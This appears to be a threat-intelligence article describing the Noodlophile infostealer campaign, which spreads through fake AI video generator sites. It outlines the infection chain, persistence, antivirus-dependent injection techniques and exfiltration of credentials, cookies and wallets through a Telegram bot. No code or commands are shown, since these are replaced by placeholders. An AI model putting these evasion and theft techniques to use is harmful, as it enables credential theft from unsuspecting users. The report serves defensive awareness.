Introduction

Cybercriminals are increasingly exploiting the burgeoning interest in artificial intelligence (AI) by deploying sophisticated malware campaigns. A recent example is the Noodlophile malware, which masquerades as AI-powered video generation tools to infiltrate Windows systems and steal sensitive data.

The Deceptive Lure: Fake AI Video Generators

Attackers have created fraudulent websites with enticing names like "Dream Machine," promoted through high-visibility Facebook ads. These sites claim to offer advanced AI-driven video creation services, attracting users eager to leverage AI for content generation. Upon visiting these sites, users are prompted to upload media files, expecting AI-generated videos in return. Instead, they receive a ZIP archive containing a malicious executable disguised as a video file, such as INLINECODE0 . This deceptive naming exploits Windows' default setting of hiding file extensions, making the executable appear as a harmless media file. (bleepingcomputer.com)

Multi-Stage Infection Chain

Executing the disguised file initiates a complex infection process:

  1. Execution of Repurposed Software: The executable is a 32-bit C++ application, signed with a certificate created via Winauth, and is actually a repurposed version of CapCut, a legitimate video editing tool (version 445.0). This repurposing helps it evade initial suspicion and some security solutions. (morphisec.com)
  2. Deployment of Malicious Components: The application launches a series of executables, including a batch script (INLINECODE1 ), which uses INLINECODE2 to decode and extract a base64-encoded, password-protected RAR archive disguised as a PDF document. (morphisec.com)
  3. Establishing Persistence: The script adds a new registry key to ensure the malware runs upon system startup. (morphisec.com)
  4. Payload Execution: The script executes INLINECODE3 , which runs an obfuscated Python script (INLINECODE4 ) fetched from a hardcoded remote server address, eventually executing the Noodlophile Stealer in memory. (morphisec.com)

Depending on the system's security posture, the malware employs different injection techniques. If Avast antivirus is detected, it uses process hollowing to inject the payload into INLINECODE5 , a legitimate Windows binary. Otherwise, it utilizes shellcode injection for in-memory execution, minimizing detection risks. (morphisec.com)

Noodlophile Stealer: A New Threat

Noodlophile is a previously undocumented information-stealing malware that targets data stored in web browsers, including account credentials, session cookies, tokens, and cryptocurrency wallet files. It exfiltrates stolen data via a Telegram bot, serving as a covert command and control (C2) server, providing attackers with real-time access to the compromised information. In some instances, Noodlophile is bundled with XWorm, a remote access trojan, granting attackers elevated data theft capabilities beyond passive information stealing. (bleepingcomputer.com)

Implications and Impact

The Noodlophile campaign underscores a significant evolution in cyber threats, where attackers exploit the public's trust in emerging AI technologies. By leveraging the allure of AI-powered tools, they effectively deceive users into compromising their systems. The use of legitimate software components and advanced obfuscation techniques makes detection and mitigation challenging. The potential for widespread data theft, including sensitive personal and financial information, poses substantial risks to individuals and organizations alike.

Technical Details

  • Malware Delivery: The initial payload is delivered through a ZIP archive containing a deceptively named executable.
  • Execution Mechanism: The executable is a repurposed version of CapCut, signed with a fraudulent certificate, which initiates the infection chain.
  • Persistence: The malware establishes persistence by adding a registry key, ensuring it runs upon system startup.
  • Data Exfiltration: Stolen data is exfiltrated via a Telegram bot, providing attackers with real-time access.
  • Additional Payloads: In some cases, the malware deploys XWorm, a remote access trojan, for enhanced control over the infected system.

Conclusion

The Noodlophile malware campaign highlights the growing sophistication of cyber threats that exploit the popularity of AI technologies. Users must exercise caution when engaging with online AI tools, especially those promoted through social media ads. Implementing robust cybersecurity practices, such as verifying the authenticity of software sources, maintaining updated security software, and being vigilant about file extensions and downloads, is crucial in mitigating such threats.